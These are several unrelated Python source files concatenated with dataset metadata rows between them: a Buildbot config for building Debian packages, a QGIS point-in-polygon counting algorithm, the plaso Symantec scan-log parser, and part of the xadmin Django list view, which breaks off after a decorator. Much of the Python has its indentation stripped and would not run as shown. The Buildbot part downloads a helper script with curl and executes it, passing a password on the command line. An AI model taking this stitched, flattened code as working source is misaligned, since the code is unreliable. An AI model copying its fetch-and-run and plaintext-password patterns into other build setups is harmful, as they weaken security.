# {'repo':'dante','version':'1.4.2', 'deb':'dante', 'subdir': '', 'repo_root':'nextgis', 'url': '', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'pam-pgsql','version':'0.7.3.3', 'deb':'pam-pgsql', 'subdir': '', 'repo_root':'nextgis', 'url': '', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'protobuf-c','version':'1.3.0', 'deb':'protobuf-c', 'subdir': '', 'repo_root':'nextgis-borsch', 'url': '', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'protobuf','version':'3.5.1', 'deb':'protobuf', 'subdir': '', 'repo_root':'nextgis-borsch', 'url': '', 'ubuntu_distributions': ['trusty', 'focal', 'bionic']},
# {'repo':'osrm-backend','version':'0.1', 'deb':'osrm-backend', 'subdir': '', 'repo_root':'nextgis-borsch', 'url': '', 'ubuntu_distributions': ['bionic']},
]
c['change_source'] = []
c['schedulers'] = []
c['builders'] = []
platforms = [
{'name' : 'focal', 'worker' : 'deb-build-focal'},
{'name' : 'bionic', 'worker' : 'deb-build-bionic'},
{'name' : 'xenial', 'worker' : 'deb-build-xenial'},
{'name' : 'trusty', 'worker' : 'deb-build-trusty'},
{'name' : 'stretch', 'worker' : 'deb-build-stretch'},
{'name' : 'buster', 'worker' : 'deb-build-buster'},
{'name' : 'sid', 'worker' : 'deb-build-sid'},
]
build_lock = util.MasterLock("deb_worker_builds")
script_src = 'https://raw.githubusercontent.com/nextgis/buildbot/master/worker/deb_util.py'
script_name = 'deb_util.py'
logname = 'stdio'
username = 'buildbot'
userkey = os.environ.get("BUILDBOT_PASSWORD")
root_dir = 'build'
ver_dir = root_dir + '/ver'
def get_env(os):
env = {
'BUILDBOT_USERPWD': '{}:{}'.format(username, userkey),
}
return env
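# Illustrative return value of get_env: {'BUILDBOT_USERPWD': 'buildbot:<secret>'};
# the os argument is currently unused here, presumably kept for per-distribution overrides.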
# Create builders
for repository in repositories:
project_name = repository['repo']
org = repository['org']
repourl = '{}/{}/{}.git'.format(repository['repo_root'], org, project_name)
branch = 'master'
if 'branch' in repository:
branch = repository['branch']
git_project_name = '{}/{}'.format(org, project_name)
git_poller = changes.GitPoller(project = git_project_name,
repourl = repourl,
workdir = project_name + '-workdir',
branches = [branch],
pollinterval = 5400,)
c['change_source'].append(git_poller)
builderNames = []
for platform in platforms:
if platform['name'] in repository['os']:
builderNames.append(project_name + "_" + platform['name'])
scheduler = schedulers.SingleBranchScheduler(
name=project_name + "_deb",
change_filter=util.ChangeFilter(project = git_project_name, branch=branch),
treeStableTimer=1*60,
builderNames=builderNames,)
c['schedulers'].append(scheduler)
c['schedulers'].append(schedulers.ForceScheduler(
name=project_name + "_force_deb",
builderNames=builderNames,))
deb_name = repository['deb']
code_dir_last = deb_name + '_code'
code_dir = root_dir + '/' + code_dir_last
for platform in platforms:
if platform['name'] not in repository['os']:
continue
factory = util.BuildFactory()
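        # Build pipeline sketch (mirroring the steps added below): checkout the
        # sources, fetch the deb_util.py helper, register the repka and any extra
        # apt repositories, upgrade packages, generate the debian/ directory,
        # install build deps with mk-build-deps, run cmake to produce version.str,
        # write the changelog, build with dpkg-buildpackage and upload to repka.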
# 1. checkout the source
factory.addStep(steps.Git(repourl=repourl,
mode='full', shallow=True, submodules=True,
workdir=code_dir))
factory.addStep(steps.ShellSequence(commands=[
util.ShellArg(command=["curl", script_src, '-o', script_name, '-s', '-L'],
logname=logname),
],
name="Download scripts",
haltOnFailure=True,
workdir=root_dir))
factory.addStep(steps.ShellCommand(command=["python", script_name, '-op', 'add_repka_repo',
'--repo_id', repository['repo_id'], '--login', username, '--password', userkey
],
name="Add apt repository", haltOnFailure=True, workdir=root_dir))
if 'apt_repos' in repository:
for apt_repo_info in repository['apt_repos']:
if apt_repo_info['type'] == 'repka':
factory.addStep(steps.ShellCommand(command=["python", script_name,
'-op', 'add_repka_repo', '--repo_id', apt_repo_info['repka_id'],
'--login', username, '--password', userkey
],
name="Add additional repka apt repository", haltOnFailure=True, workdir=root_dir))
elif apt_repo_info['type'] == 'deb':
factory.addStep(steps.ShellCommand(command=["python", script_name,
'-op', 'add_deb_repo', '--deb', apt_repo_info['deb'].format(platform['name']),
'--deb_key', apt_repo_info['key'],
'--deb_keyserver', apt_repo_info['keyserver']
],
name="Add additional deb apt repository", haltOnFailure=True, workdir=root_dir))
factory.addStep(steps.ShellCommand(command=["apt-get", "-y", "upgrade"],
env={'DEBIAN_FRONTEND': 'noninteractive'},
name="Upgrade packages"))
factory.addStep(steps.ShellCommand(command=['python', script_name, '-op', 'create_debian', '-vf', 'ver/version.str',
'-rp', code_dir_last, '-dp', '.', '-pn', deb_name, '--repo_id', repository['repo_id'], '--login', username,
'--password', userkey
],
name="Create debian directory", haltOnFailure=True, workdir=root_dir))
factory.addStep(steps.ShellCommand(command=['mk-build-deps', '--install',
'--tool=apt -o Debug::pkgProblemResolver=yes --no-install-recommends --yes', 'debian/control'
],
name="Install dependencies", haltOnFailure=True, timeout=25 * 60,
maxTime=2 * 60 * 60, workdir=code_dir))
# 2. Make configure to generate version.str
factory.addStep(steps.MakeDirectory(dir=ver_dir, name="Make ver directory"))
factory.addStep(steps.ShellCommand(command=["cmake", '-DBUILD_TESTING=OFF', '-DBUILD_NEXTGIS_PACKAGE=ON' ,'../' + code_dir_last],
name="Make configure to generate version.str",
workdir=ver_dir, warnOnFailure=True, env=get_env(platform['name'])
))
# 3. Create debian folder
factory.addStep(steps.ShellCommand(command=['python', script_name, '-op', 'changelog', '-vf', 'ver/version.str',
'-rp', code_dir_last, '-dp', '.', '-pn', deb_name, '--repo_id', repository['repo_id'], '--login', username,
'--password', userkey
],
name="Create debian changelog", haltOnFailure=True, workdir=root_dir))
# 4. Create packages
factory.addStep(steps.ShellSequence(commands=[
util.ShellArg(command=["dpkg-buildpackage", '-b', '-us', '-uc'],
logname=logname),
],
name="Create packages", haltOnFailure=True, timeout=125 * 60,
maxTime=5 * 60 * 60, workdir=code_dir, env=get_env(platform['name']),
))
# 5. Upload to repka
factory.addStep(steps.ShellCommand(command=['python', script_name, '-op', 'make_release', '-vf', 'ver/version.str',
'-rp', code_dir_last, '-dp', '.', '-pn', deb_name, '--repo_id', repository['repo_id'], '--login', username,
'--password', userkey
],
name="Upload to repka", haltOnFailure=True, timeout=125 * 60,
maxTime=5 * 60 * 60, workdir=root_dir))
builder = util.BuilderConfig(name = project_name + "_" + platform['name'],
workernames = [platform['worker']],
factory = factory,
locks = [build_lock.access('exclusive')], # counting
description="Make {} on {}".format(project_name, platform['name']),)
c['builders'].append(builder)
| gpl-2.0 | 597,300,990,202,796,500 | 59.201878 | 316 | 0.562583 | false |
mweisman/QGIS | python/plugins/processing/algs/ftools/PointsInPolygonUnique.py | 6 | 4944 | # -*- coding: utf-8 -*-
"""
***************************************************************************
PointsInPolygon.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import *
from qgis.core import *
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.parameters.ParameterVector import ParameterVector
from processing.parameters.ParameterString import ParameterString
from processing.parameters.ParameterTableField import ParameterTableField
from processing.outputs.OutputVector import OutputVector
from processing.tools import dataobjects, vector
class PointsInPolygonUnique(GeoAlgorithm):
POLYGONS = 'POLYGONS'
POINTS = 'POINTS'
OUTPUT = 'OUTPUT'
FIELD = 'FIELD'
CLASSFIELD = 'CLASSFIELD'
# =========================================================================
# def getIcon(self):
# return QIcon(os.path.dirname(__file__) + "/icons/sum_points.png")
# =========================================================================
def defineCharacteristics(self):
self.name = 'Count unique points in polygon'
self.group = 'Vector analysis tools'
self.addParameter(ParameterVector(self.POLYGONS, 'Polygons',
[ParameterVector.VECTOR_TYPE_POLYGON]))
self.addParameter(ParameterVector(self.POINTS, 'Points',
[ParameterVector.VECTOR_TYPE_POINT]))
self.addParameter(ParameterTableField(self.CLASSFIELD, 'Class field',
self.POINTS))
self.addParameter(ParameterString(self.FIELD, 'Count field name',
'NUMPOINTS'))
self.addOutput(OutputVector(self.OUTPUT, 'Result'))
def processAlgorithm(self, progress):
polyLayer = dataobjects.getObjectFromUri(
self.getParameterValue(self.POLYGONS))
pointLayer = dataobjects.getObjectFromUri(
self.getParameterValue(self.POINTS))
fieldName = self.getParameterValue(self.FIELD)
classFieldName = self.getParameterValue(self.CLASSFIELD)
polyProvider = polyLayer.dataProvider()
classFieldIndex = pointLayer.fieldNameIndex(classFieldName)
(idxCount, fieldList) = vector.findOrCreateField(polyLayer,
polyLayer.pendingFields(), fieldName)
writer = self.getOutputFromName(
self.OUTPUT).getVectorWriter(fieldList.toList(),
polyProvider.geometryType(),
polyProvider.crs())
spatialIndex = vector.spatialindex(pointLayer)
ftPoint = QgsFeature()
outFeat = QgsFeature()
geom = QgsGeometry()
current = 0
hasIntersections = False
features = vector.features(polyLayer)
total = 100.0 / float(len(features))
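        # For every polygon: the spatial index yields candidate points from the
        # bounding box, an exact geometry.contains() test filters them, and the
        # number of distinct class-field values is written to the count field.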
for ftPoly in features:
geom = ftPoly.geometry()
attrs = ftPoly.attributes()
classes = []
hasIntersections = False
points = spatialIndex.intersects(geom.boundingBox())
if len(points) > 0:
hasIntersections = True
if hasIntersections:
for i in points:
request = QgsFeatureRequest().setFilterFid(i)
ftPoint = pointLayer.getFeatures(request).next()
tmpGeom = QgsGeometry(ftPoint.geometry())
if geom.contains(tmpGeom):
clazz = ftPoint.attributes()[classFieldIndex]
if not clazz in classes:
classes.append(clazz)
outFeat.setGeometry(geom)
if idxCount == len(attrs):
attrs.append(len(classes))
else:
attrs[idxCount] = len(classes)
outFeat.setAttributes(attrs)
writer.addFeature(outFeat)
current += 1
            progress.setPercentage(int(current * total))
del writer
| gpl-2.0 | 3,896,842,395,292,248,600 | 38.552 | 79 | 0.535599 | false |
rgayon/plaso | plaso/parsers/symantec.py | 1 | 12476 | # -*- coding: utf-8 -*-
"""This file contains a Symantec parser in plaso."""
from __future__ import unicode_literals
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers import dsv_parser
from plaso.parsers import manager
class SymantecEventData(events.EventData):
"""Symantec event data.
Attributes:
access (str): access.
action0 (str): action0.
action1 (str): action1.
action1_status (str): action1 status.
action2 (str): action2.
action2_status (str): action2 status.
address (str): address.
backup_id (str): backup identifier.
cat (str): category.
cleaninfo (str): clean information.
clientgroup (str): client group.
compressed (str): compressed.
computer (str): computer.
definfo (str): definfo.
defseqnumber (str): def sequence number.
deleteinfo (str): delete information.
depth (str): depth.
description (str): description.
domain_guid (str): domain identifier (GUID).
domainname (str): domain name.
err_code (str): error code.
event_data (str): event data.
event (str): event.
extra (str): extra.
file (str): file.
flags (str): flags.
groupid (str): group identifier.
guid (str): guid.
license_expiration_dt (str): license expiration date.
license_feature_name (str): license feature name.
license_feature_ver (str): license feature ver.
license_fulfillment_id (str): license fulfillment identifier.
license_lifecycle (str): license lifecycle.
license_seats_delta (str): license seats delta.
license_seats (str): license seats.
license_seats_total (str): license seats total.
license_serial_num (str): license serial number.
license_start_dt (str): license start date.
logger (str): logger.
login_domain (str): login domain.
log_session_guid (str): log session identifier (GUID).
macaddr (str): MAC address.
new_ext (str): new ext.
ntdomain (str): ntdomain.
offset (str): offset.
parent (str): parent.
quarfwd_status (str): quarfwd status.
remote_machine_ip (str): remote machine IP address.
remote_machine (str): remote machine.
scanid (str): scan identifier.
snd_status (str): snd status.
status (str): status.
still_infected (str): still infected.
time (str): time.
user (str): user.
vbin_id (str): vbin identifier.
vbin_session_id (str): vbin session identifier.
version (str): version.
virus_id (str): virus identifier.
virus (str): virus.
virustype (str): virustype.
"""
DATA_TYPE = 'av:symantec:scanlog'
def __init__(self):
"""Initializes event data."""
super(SymantecEventData, self).__init__(data_type=self.DATA_TYPE)
self.access = None
self.action0 = None
self.action1 = None
self.action1_status = None
self.action2 = None
self.action2_status = None
self.address = None
self.backup_id = None
self.cat = None
self.cleaninfo = None
self.clientgroup = None
self.compressed = None
self.computer = None
self.definfo = None
self.defseqnumber = None
self.deleteinfo = None
self.depth = None
self.description = None
self.domain_guid = None
self.domainname = None
self.err_code = None
self.event_data = None
self.event = None
self.extra = None
self.file = None
self.flags = None
self.groupid = None
self.guid = None
self.license_expiration_dt = None
self.license_feature_name = None
self.license_feature_ver = None
self.license_fulfillment_id = None
self.license_lifecycle = None
self.license_seats_delta = None
self.license_seats = None
self.license_seats_total = None
self.license_serial_num = None
self.license_start_dt = None
self.logger = None
self.login_domain = None
self.log_session_guid = None
self.macaddr = None
self.new_ext = None
self.ntdomain = None
self.offset = None
self.parent = None
self.quarfwd_status = None
self.remote_machine_ip = None
self.remote_machine = None
self.scanid = None
self.snd_status = None
self.status = None
self.still_infected = None
self.time = None
self.user = None
self.vbin_id = None
self.vbin_session_id = None
self.version = None
self.virus_id = None
self.virus = None
self.virustype = None
class SymantecParser(dsv_parser.DSVParser):
"""Parses Symantec AV Corporate Edition and Endpoint Protection log files."""
NAME = 'symantec_scanlog'
DATA_FORMAT = 'AV Corporate Edition and Endpoint Protection log file'
# Define the columns that make up the structure of a Symantec log file.
# http://www.symantec.com/docs/TECH100099
COLUMNS = [
'time', 'event', 'cat', 'logger', 'computer', 'user',
'virus', 'file', 'action1', 'action2', 'action0', 'virustype',
'flags', 'description', 'scanid', 'new_ext', 'groupid',
'event_data', 'vbin_id', 'virus_id', 'quarfwd_status',
'access', 'snd_status', 'compressed', 'depth', 'still_infected',
'definfo', 'defseqnumber', 'cleaninfo', 'deleteinfo',
'backup_id', 'parent', 'guid', 'clientgroup', 'address',
'domainname', 'ntdomain', 'macaddr', 'version:',
'remote_machine', 'remote_machine_ip', 'action1_status',
'action2_status', 'license_feature_name', 'license_feature_ver',
'license_serial_num', 'license_fulfillment_id', 'license_start_dt',
'license_expiration_dt', 'license_lifecycle', 'license_seats_total',
'license_seats', 'err_code', 'license_seats_delta', 'status',
'domain_guid', 'log_session_guid', 'vbin_session_id',
'login_domain', 'extra']
def _GetTimeElementsTuple(self, timestamp):
"""Retrieves a time elements tuple from the timestamp.
    A Symantec log timestamp consists of six hexadecimal octets that represent:
First octet: Number of years since 1970
Second octet: Month, where January is represented by 0
Third octet: Day of the month
Fourth octet: Number of hours
Fifth octet: Number of minutes
Sixth octet: Number of seconds
For example, 200A13080122 represents November 19, 2002, 8:01:34 AM.
Args:
timestamp (str): hexadecimal encoded date and time values.
Returns:
tuple: containing:
year (int): year.
month (int): month, where 1 represents January.
day_of_month (int): day of month, where 1 is the first day of the month.
hours (int): hours.
minutes (int): minutes.
seconds (int): seconds.
"""
year, month, day_of_month, hours, minutes, seconds = (
int(hexdigit[0] + hexdigit[1], 16) for hexdigit in zip(
timestamp[::2], timestamp[1::2]))
return (year + 1970, month + 1, day_of_month, hours, minutes, seconds)
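  # Worked example (illustrative, matching the docstring above): '200A13080122'
  # splits into octet pairs 0x20=32 -> 1970+32=2002, 0x0A=10 -> month 11 (November),
  # 0x13=19 -> day 19, 0x08 -> 8 hours, 0x01 -> 1 minute, 0x22=34 -> 34 seconds,
  # i.e. November 19, 2002, 8:01:34 AM.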
def ParseRow(self, parser_mediator, row_offset, row):
"""Parses a line of the log file and produces events.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
row_offset (int): line number of the row.
row (dict[str, str]): fields of a single row, as specified in COLUMNS.
"""
time_elements_tuple = self._GetTimeElementsTuple(row['time'])
try:
date_time = dfdatetime_time_elements.TimeElements(
time_elements_tuple=time_elements_tuple)
date_time.is_local_time = True
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid date time value: {0!s}'.format(time_elements_tuple))
return
# TODO: remove unused attributes.
event_data = SymantecEventData()
event_data.access = row.get('access', None)
event_data.action0 = row.get('action0', None)
event_data.action1 = row.get('action1', None)
event_data.action1_status = row.get('action1_status', None)
event_data.action2 = row.get('action2', None)
event_data.action2_status = row.get('action2_status', None)
event_data.address = row.get('address', None)
event_data.backup_id = row.get('backup_id', None)
event_data.cat = row.get('cat', None)
event_data.cleaninfo = row.get('cleaninfo', None)
event_data.clientgroup = row.get('clientgroup', None)
event_data.compressed = row.get('compressed', None)
event_data.computer = row.get('computer', None)
event_data.definfo = row.get('definfo', None)
event_data.defseqnumber = row.get('defseqnumber', None)
event_data.deleteinfo = row.get('deleteinfo', None)
event_data.depth = row.get('depth', None)
event_data.description = row.get('description', None)
event_data.domain_guid = row.get('domain_guid', None)
event_data.domainname = row.get('domainname', None)
event_data.err_code = row.get('err_code', None)
event_data.event_data = row.get('event_data', None)
event_data.event = row.get('event', None)
event_data.extra = row.get('extra', None)
event_data.file = row.get('file', None)
event_data.flags = row.get('flags', None)
event_data.groupid = row.get('groupid', None)
event_data.guid = row.get('guid', None)
event_data.license_expiration_dt = row.get('license_expiration_dt', None)
event_data.license_feature_name = row.get('license_feature_name', None)
event_data.license_feature_ver = row.get('license_feature_ver', None)
event_data.license_fulfillment_id = row.get('license_fulfillment_id', None)
event_data.license_lifecycle = row.get('license_lifecycle', None)
event_data.license_seats_delta = row.get('license_seats_delta', None)
event_data.license_seats = row.get('license_seats', None)
event_data.license_seats_total = row.get('license_seats_total', None)
event_data.license_serial_num = row.get('license_serial_num', None)
event_data.license_start_dt = row.get('license_start_dt', None)
event_data.logger = row.get('logger', None)
event_data.login_domain = row.get('login_domain', None)
event_data.log_session_guid = row.get('log_session_guid', None)
event_data.macaddr = row.get('macaddr', None)
event_data.new_ext = row.get('new_ext', None)
event_data.ntdomain = row.get('ntdomain', None)
event_data.offset = row_offset
event_data.parent = row.get('parent', None)
event_data.quarfwd_status = row.get('quarfwd_status', None)
event_data.remote_machine_ip = row.get('remote_machine_ip', None)
event_data.remote_machine = row.get('remote_machine', None)
event_data.scanid = row.get('scanid', None)
event_data.snd_status = row.get('snd_status', None)
event_data.status = row.get('status', None)
event_data.still_infected = row.get('still_infected', None)
event_data.time = row.get('time', None)
event_data.user = row.get('user', None)
event_data.vbin_id = row.get('vbin_id', None)
event_data.vbin_session_id = row.get('vbin_session_id', None)
event_data.version = row.get('version:', None)
event_data.virus_id = row.get('virus_id', None)
event_data.virus = row.get('virus', None)
event_data.virustype = row.get('virustype', None)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
def VerifyRow(self, parser_mediator, row):
"""Verifies if a line of the file is in the expected format.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
row (dict[str, str]): fields of a single row, as specified in COLUMNS.
Returns:
bool: True if this is the correct parser, False otherwise.
"""
try:
time_elements_tuple = self._GetTimeElementsTuple(row['time'])
except (TypeError, ValueError):
return False
try:
dfdatetime_time_elements.TimeElements(
time_elements_tuple=time_elements_tuple)
except ValueError:
return False
try:
my_event = int(row['event'], 10)
except (TypeError, ValueError):
return False
if my_event < 1 or my_event > 77:
return False
try:
category = int(row['cat'], 10)
except (TypeError, ValueError):
return False
if category < 1 or category > 4:
return False
return True
manager.ParsersManager.RegisterParser(SymantecParser)
| apache-2.0 | 2,688,859,780,277,799,400 | 36.241791 | 80 | 0.664716 | false |
LennonChin/Django-Practices | MxOnline/extra_apps/xadmin/views/list.py | 1 | 26491 | from collections import OrderedDict
from django.core.exceptions import PermissionDenied, ObjectDoesNotExist
from django.core.paginator import InvalidPage, Paginator
from django.core.urlresolvers import NoReverseMatch
from django.db import models
from django.http import HttpResponseRedirect
from django.template.response import SimpleTemplateResponse, TemplateResponse
from django.utils.encoding import force_unicode, smart_unicode
from django.utils.html import escape, conditional_escape
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from xadmin.util import lookup_field, display_for_field, label_for_field, boolean_icon
from base import ModelAdminView, filter_hook, inclusion_tag, csrf_protect_m
# List settings
ALL_VAR = 'all'
ORDER_VAR = 'o'
PAGE_VAR = 'p'
TO_FIELD_VAR = 't'
COL_LIST_VAR = '_cols'
ERROR_FLAG = 'e'
DOT = '.'
# Text to display within change-list table cells if the value is blank.
EMPTY_CHANGELIST_VALUE = _('Null')
class FakeMethodField(object):
"""
    This class is used when a column is a model method; it wraps the method as a fake field so it can be displayed in the select-columns menu.
"""
def __init__(self, name, verbose_name):
# Initial comm field attrs
self.name = name
self.verbose_name = verbose_name
self.primary_key = False
class ResultRow(dict):
pass
class ResultItem(object):
def __init__(self, field_name, row):
self.classes = []
self.text = ' '
self.wraps = []
self.tag = 'td'
self.tag_attrs = []
self.allow_tags = False
self.btns = []
self.menus = []
self.is_display_link = False
self.row = row
self.field_name = field_name
self.field = None
self.attr = None
self.value = None
@property
def label(self):
text = mark_safe(
self.text) if self.allow_tags else conditional_escape(self.text)
if force_unicode(text) == '':
text = mark_safe(' ')
for wrap in self.wraps:
text = mark_safe(wrap % text)
return text
@property
def tagattrs(self):
return mark_safe(
'%s%s' % ((self.tag_attrs and ' '.join(self.tag_attrs) or ''),
(self.classes and (' class="%s"' % ' '.join(self.classes)) or '')))
class ResultHeader(ResultItem):
def __init__(self, field_name, row):
super(ResultHeader, self).__init__(field_name, row)
self.tag = 'th'
self.tag_attrs = ['scope="col"']
self.sortable = False
self.allow_tags = True
self.sorted = False
self.ascending = None
self.sort_priority = None
self.url_primary = None
self.url_remove = None
self.url_toggle = None
class ListAdminView(ModelAdminView):
"""
    Display model objects list view. This class provides ordering and simple filter features.
"""
list_display = ('__str__',)
list_display_links = ()
list_display_links_details = False
list_select_related = None
list_per_page = 50
list_max_show_all = 200
list_exclude = ()
search_fields = ()
paginator_class = Paginator
ordering = None
# Change list templates
object_list_template = None
def init_request(self, *args, **kwargs):
if not self.has_view_permission():
raise PermissionDenied
request = self.request
request.session['LIST_QUERY'] = (self.model_info, self.request.META['QUERY_STRING'])
self.pk_attname = self.opts.pk.attname
self.lookup_opts = self.opts
self.list_display = self.get_list_display()
self.list_display_links = self.get_list_display_links()
# Get page number parameters from the query string.
try:
self.page_num = int(request.GET.get(PAGE_VAR, 0))
except ValueError:
self.page_num = 0
# Get params from request
self.show_all = ALL_VAR in request.GET
self.to_field = request.GET.get(TO_FIELD_VAR)
self.params = dict(request.GET.items())
if PAGE_VAR in self.params:
del self.params[PAGE_VAR]
if ERROR_FLAG in self.params:
del self.params[ERROR_FLAG]
@filter_hook
def get_list_display(self):
"""
Return a sequence containing the fields to be displayed on the list.
"""
self.base_list_display = (COL_LIST_VAR in self.request.GET and self.request.GET[COL_LIST_VAR] != "" and \
self.request.GET[COL_LIST_VAR].split('.')) or self.list_display
return list(self.base_list_display)
@filter_hook
def get_list_display_links(self):
"""
Return a sequence containing the fields to be displayed as links
on the changelist. The list_display parameter is the list of fields
returned by get_list_display().
"""
if self.list_display_links or not self.list_display:
return self.list_display_links
else:
# Use only the first item in list_display as link
return list(self.list_display)[:1]
def make_result_list(self):
# Get search parameters from the query string.
self.base_queryset = self.queryset()
self.list_queryset = self.get_list_queryset()
self.ordering_field_columns = self.get_ordering_field_columns()
self.paginator = self.get_paginator()
# Get the number of objects, with admin filters applied.
self.result_count = self.paginator.count
# Get the total number of objects, with no admin filters applied.
# Perform a slight optimization: Check to see whether any filters were
# given. If not, use paginator.hits to calculate the number of objects,
# because we've already done paginator.hits and the value is cached.
if not self.list_queryset.query.where:
self.full_result_count = self.result_count
else:
self.full_result_count = self.base_queryset.count()
self.can_show_all = self.result_count <= self.list_max_show_all
self.multi_page = self.result_count > self.list_per_page
# Get the list of objects to display on this page.
if (self.show_all and self.can_show_all) or not self.multi_page:
self.result_list = self.list_queryset._clone()
else:
try:
self.result_list = self.paginator.page(
self.page_num + 1).object_list
except InvalidPage:
if ERROR_FLAG in self.request.GET.keys():
return SimpleTemplateResponse('xadmin/views/invalid_setup.html', {
'title': _('Database error'),
})
return HttpResponseRedirect(self.request.path + '?' + ERROR_FLAG + '=1')
self.has_more = self.result_count > (
self.list_per_page * self.page_num + len(self.result_list))
@filter_hook
def get_result_list(self):
return self.make_result_list()
@filter_hook
def post_result_list(self):
return self.make_result_list()
@filter_hook
def get_list_queryset(self):
"""
        Get the model queryset. The queryset has been filtered and ordered.
"""
# First, get queryset from base class.
queryset = self.queryset()
# Use select_related() if one of the list_display options is a field
# with a relationship and the provided queryset doesn't already have
# select_related defined.
if not queryset.query.select_related:
if self.list_select_related:
queryset = queryset.select_related()
elif self.list_select_related is None:
related_fields = []
for field_name in self.list_display:
try:
field = self.opts.get_field(field_name)
except models.FieldDoesNotExist:
pass
else:
if isinstance(field.rel, models.ManyToOneRel):
related_fields.append(field_name)
if related_fields:
queryset = queryset.select_related(*related_fields)
else:
pass
# Then, set queryset ordering.
queryset = queryset.order_by(*self.get_ordering())
# Return the queryset.
return queryset
# List ordering
def _get_default_ordering(self):
ordering = []
if self.ordering:
ordering = self.ordering
elif self.opts.ordering:
ordering = self.opts.ordering
return ordering
@filter_hook
def get_ordering_field(self, field_name):
"""
Returns the proper model field name corresponding to the given
field_name to use for ordering. field_name may either be the name of a
proper model field or the name of a method (on the admin or model) or a
callable with the 'admin_order_field' attribute. Returns None if no
proper model field name can be matched.
"""
try:
field = self.opts.get_field(field_name)
return field.name
except models.FieldDoesNotExist:
# See whether field_name is a name of a non-field
# that allows sorting.
if callable(field_name):
attr = field_name
elif hasattr(self, field_name):
attr = getattr(self, field_name)
else:
attr = getattr(self.model, field_name)
return getattr(attr, 'admin_order_field', None)
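    # Illustrative (hypothetical callable, not from the original source): a
    # list_display entry such as
    #     def colored_name(self, obj): ...
    #     colored_name.admin_order_field = 'name'
    # resolves to 'name' here, while a plain model field resolves to its own name.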
@filter_hook
def get_ordering(self):
"""
Returns the list of ordering fields for the change list.
First we check the get_ordering() method in model admin, then we check
the object's default ordering. Then, any manually-specified ordering
from the query string overrides anything. Finally, a deterministic
order is guaranteed by ensuring the primary key is used as the last
ordering field.
"""
ordering = list(super(ListAdminView, self).get_ordering()
or self._get_default_ordering())
if ORDER_VAR in self.params and self.params[ORDER_VAR]:
# Clear ordering and used params
ordering = [pfx + self.get_ordering_field(field_name) for n, pfx, field_name in
map(
lambda p: p.rpartition('-'),
self.params[ORDER_VAR].split('.'))
if self.get_ordering_field(field_name)]
# Ensure that the primary key is systematically present in the list of
# ordering fields so we can guarantee a deterministic order across all
# database backends.
pk_name = self.opts.pk.name
if not (set(ordering) & set(['pk', '-pk', pk_name, '-' + pk_name])):
# The two sets do not intersect, meaning the pk isn't present. So
# we add it.
ordering.append('-pk')
return ordering
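    # Example (illustrative): a query string such as ?o=name.-pk orders by
    # 'name' ascending, then 'pk' descending; '-pk' is appended automatically
    # whenever the primary key is not already part of the ordering.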
@filter_hook
def get_ordering_field_columns(self):
"""
        Returns an OrderedDict of ordering field column numbers and asc/desc
"""
# We must cope with more than one column having the same underlying sort
# field, so we base things on column numbers.
ordering = self._get_default_ordering()
ordering_fields = OrderedDict()
if ORDER_VAR not in self.params or not self.params[ORDER_VAR]:
# for ordering specified on ModelAdmin or model Meta, we don't know
# the right column numbers absolutely, because there might be more
# than one column associated with that ordering, so we guess.
for field in ordering:
if field.startswith('-'):
field = field[1:]
order_type = 'desc'
else:
order_type = 'asc'
for attr in self.list_display:
if self.get_ordering_field(attr) == field:
ordering_fields[field] = order_type
break
else:
for p in self.params[ORDER_VAR].split('.'):
none, pfx, field_name = p.rpartition('-')
ordering_fields[field_name] = 'desc' if pfx == '-' else 'asc'
return ordering_fields
def get_check_field_url(self, f):
"""
        Return the query string link for the select-columns menu item of the given field.
        We must use base_list_display, because list_display may be changed by plugins.
"""
fields = [fd for fd in self.base_list_display if fd != f.name]
if len(self.base_list_display) == len(fields):
if f.primary_key:
fields.insert(0, f.name)
else:
fields.append(f.name)
return self.get_query_string({COL_LIST_VAR: '.'.join(fields)})
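    # Example (illustrative, hypothetical field names): clicking an unchecked
    # field appends it (a primary key is inserted first), clicking a checked
    # field removes it, and the result is joined with '.' into a link such as
    # ?_cols=title.name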
def get_model_method_fields(self):
"""
        Return the method fields defined on the model, wrapping each method in a FakeMethodField so it can be displayed like a db field.
"""
methods = []
for name in dir(self):
try:
if getattr(getattr(self, name), 'is_column', False):
methods.append((name, getattr(self, name)))
except:
pass
return [FakeMethodField(name, getattr(method, 'short_description', capfirst(name.replace('_', ' '))))
for name, method in methods]
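    # Illustrative (hypothetical method name): an admin method flagged with
    #     my_method.is_column = True
    #     my_method.short_description = 'My column'
    # is picked up here and offered in the column selector like a real db field.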
@filter_hook
def get_context(self):
"""
Prepare the context for templates.
"""
self.title = _('%s List') % force_unicode(self.opts.verbose_name)
model_fields = [(f, f.name in self.list_display, self.get_check_field_url(f))
for f in (list(self.opts.fields) + self.get_model_method_fields()) if f.name not in self.list_exclude]
new_context = {
'model_name': force_unicode(self.opts.verbose_name_plural),
'title': self.title,
'cl': self,
'model_fields': model_fields,
'clean_select_field_url': self.get_query_string(remove=[COL_LIST_VAR]),
'has_add_permission': self.has_add_permission(),
'app_label': self.app_label,
'brand_name': self.opts.verbose_name_plural,
'brand_icon': self.get_model_icon(self.model),
'add_url': self.model_admin_url('add'),
'result_headers': self.result_headers(),
'results': self.results()
}
context = super(ListAdminView, self).get_context()
context.update(new_context)
return context
@filter_hook
def get_response(self, context, *args, **kwargs):
pass
@csrf_protect_m
@filter_hook
